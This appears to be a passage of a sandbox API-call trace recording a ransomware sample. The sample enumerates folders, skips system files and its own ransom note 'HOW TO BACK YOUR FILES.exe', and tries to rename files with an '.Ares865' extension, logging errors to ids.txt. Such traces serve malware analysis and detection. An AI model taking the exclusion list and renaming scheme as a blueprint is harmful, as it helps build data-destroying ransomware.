lstrcmpiW (lpString1="Event Viewer", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="aoldtz.exe") returned 1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2=".") returned 1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="..") returned 1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="windows") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="bootmgr") returned 1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="temp") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="pagefile.sys") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="boot") returned 1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="ids.txt") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="ntuser.dat") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="perflogs") returned -1 [0091.011] lstrcmpiW (lpString1="Event Viewer", lpString2="MSBuild") returned -1 [0091.011] lstrlenW (lpString="Event Viewer") returned 12 [0091.011] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\eHome") returned 204 [0091.011] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Event Viewer" | out: lpString1="Event Viewer") returned="Event Viewer" [0091.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0091.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a8) returned 0x32d4f0 [0091.011] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0091.011] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c315d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.011] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.011] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66a32400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66a32400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0091.011] lstrcmpiW (lpString1="IdentityCRL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="aoldtz.exe") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2=".") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="..") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="windows") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="bootmgr") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="temp") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="pagefile.sys") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="boot") returned 1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="ids.txt") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="ntuser.dat") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="perflogs") returned -1 [0091.012] lstrcmpiW (lpString1="IdentityCRL", lpString2="MSBuild") returned -1 [0091.012] lstrlenW (lpString="IdentityCRL") returned 11 [0091.012] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Event Viewer") returned 211 [0091.012] lstrcpyW (in: lpString1=0x2cce58e, lpString2="IdentityCRL" | out: lpString1="IdentityCRL") returned="IdentityCRL" [0091.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0091.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a6) returned 0x32d6a8 [0091.012] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0091.012] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2=".") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="..") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="windows") returned -1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="bootmgr") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="temp") returned -1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="pagefile.sys") returned -1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="boot") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="ids.txt") returned 1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="ntuser.dat") returned -1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="perflogs") returned -1 [0091.012] lstrcmpiW (lpString1="Media Player", lpString2="MSBuild") returned -1 [0091.012] lstrlenW (lpString="Media Player") returned 12 [0091.012] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\IdentityCRL") returned 210 [0091.012] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0091.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0091.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a8) returned 0x32d860 [0091.013] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0091.013] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669bffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x669bffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="aoldtz.exe") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2=".") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="..") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="windows") returned -1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="bootmgr") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="temp") returned -1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="pagefile.sys") returned -1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="boot") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="ids.txt") returned 1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="ntuser.dat") returned -1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="perflogs") returned -1 [0091.013] lstrcmpiW (lpString1="MF", lpString2="MSBuild") returned -1 [0091.013] lstrlenW (lpString="MF") returned 2 [0091.013] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned 211 [0091.013] lstrcpyW (in: lpString1=0x2cce58e, lpString2="MF" | out: lpString1="MF") returned="MF" [0091.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0091.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x194) returned 0x2ca068 [0091.013] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0091.013] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="aoldtz.exe") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2=".") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="..") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="windows") returned -1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="bootmgr") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="temp") returned -1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="pagefile.sys") returned -1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="boot") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="ids.txt") returned 1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="ntuser.dat") returned -1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="perflogs") returned -1 [0091.013] lstrcmpiW (lpString1="MSDN", lpString2="MSBuild") returned 1 [0091.013] lstrlenW (lpString="MSDN") returned 4 [0091.013] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\MF") returned 201 [0091.014] lstrcpyW (in: lpString1=0x2cce58e, lpString2="MSDN" | out: lpString1="MSDN") returned="MSDN" [0091.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0091.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x198) returned 0x2cc760 [0091.014] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0091.014] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="aoldtz.exe") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2=".") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="..") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="windows") returned -1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="bootmgr") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="temp") returned -1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="pagefile.sys") returned -1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="boot") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="ids.txt") returned 1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="ntuser.dat") returned -1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="perflogs") returned -1 [0091.014] lstrcmpiW (lpString1="NetFramework", lpString2="MSBuild") returned 1 [0091.014] lstrlenW (lpString="NetFramework") returned 12 [0091.014] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\MSDN") returned 203 [0091.014] lstrcpyW (in: lpString1=0x2cce58e, lpString2="NetFramework" | out: lpString1="NetFramework") returned="NetFramework" [0091.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0091.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a8) returned 0x32da18 [0091.014] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0091.014] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="aoldtz.exe") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="bootmgr") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="temp") returned -1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="pagefile.sys") returned -1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="boot") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="ids.txt") returned 1 [0091.014] lstrcmpiW (lpString1="Network", lpString2="ntuser.dat") returned -1 [0091.015] lstrcmpiW (lpString1="Network", lpString2="perflogs") returned -1 [0091.015] lstrcmpiW (lpString1="Network", lpString2="MSBuild") returned 1 [0091.015] lstrlenW (lpString="Network") returned 7 [0091.015] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\NetFramework") returned 211 [0091.015] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Network" | out: lpString1="Network") returned="Network" [0091.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0091.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19e) returned 0x3314c0 [0091.015] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0091.015] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x64b40600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64b40600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="aoldtz.exe") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2=".") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="..") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="windows") returned -1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="bootmgr") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="temp") returned -1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="pagefile.sys") returned -1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="boot") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="ids.txt") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="ntuser.dat") returned 1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="perflogs") returned -1 [0091.015] lstrcmpiW (lpString1="OFFICE", lpString2="MSBuild") returned 1 [0091.015] lstrlenW (lpString="OFFICE") returned 6 [0091.015] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Network") returned 206 [0091.015] lstrcpyW (in: lpString1=0x2cce58e, lpString2="OFFICE" | out: lpString1="OFFICE") returned="OFFICE" [0091.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0091.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19c) returned 0x331668 [0091.015] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0091.015] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64762240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64762240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="aoldtz.exe") returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="windows") returned -1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="bootmgr") returned 1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="temp") returned -1 [0091.015] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="pagefile.sys") returned -1 [0091.016] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="boot") returned 1 [0091.016] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="ids.txt") returned 1 [0091.016] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="ntuser.dat") returned 1 [0091.016] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="perflogs") returned -1 [0091.016] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="MSBuild") returned 1 [0091.016] lstrlenW (lpString="OfficeSoftwareProtectionPlatform") returned 32 [0091.016] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\OFFICE") returned 205 [0091.016] lstrcpyW (in: lpString1=0x2cce58e, lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="OfficeSoftwareProtectionPlatform") returned="OfficeSoftwareProtectionPlatform" [0091.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0091.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1d0) returned 0x2d5ee0 [0091.016] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0091.016] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="aoldtz.exe") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2=".") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="..") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="windows") returned -1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="bootmgr") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="temp") returned -1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="pagefile.sys") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="boot") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="ids.txt") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="ntuser.dat") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="perflogs") returned 1 [0091.016] lstrcmpiW (lpString1="RAC", lpString2="MSBuild") returned 1 [0091.016] lstrlenW (lpString="RAC") returned 3 [0091.016] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 231 [0091.016] lstrcpyW (in: lpString1=0x2cce58e, lpString2="RAC" | out: lpString1="RAC") returned="RAC" [0091.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0091.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x196) returned 0x2cb310 [0091.016] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0091.016] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0091.016] lstrcmpiW (lpString1="Search", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.016] lstrcmpiW (lpString1="Search", lpString2="aoldtz.exe") returned 1 [0091.016] lstrcmpiW (lpString1="Search", lpString2=".") returned 1 [0091.016] lstrcmpiW (lpString1="Search", lpString2="..") returned 1 [0091.016] lstrcmpiW (lpString1="Search", lpString2="windows") returned -1 [0091.025] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 236 [0091.025] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0091.025] GetLastError () returned 0x20 [0091.025] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 258 [0091.025] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 258 [0091.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.025] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x548e [0091.025] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x102, lpOverlapped=0x0) returned 1 [0091.026] CloseHandle (hObject=0x118) returned 1 [0091.026] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.026] CloseHandle (hObject=0x0) returned 0 [0091.026] CloseHandle (hObject=0x0) returned 0 [0091.026] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: 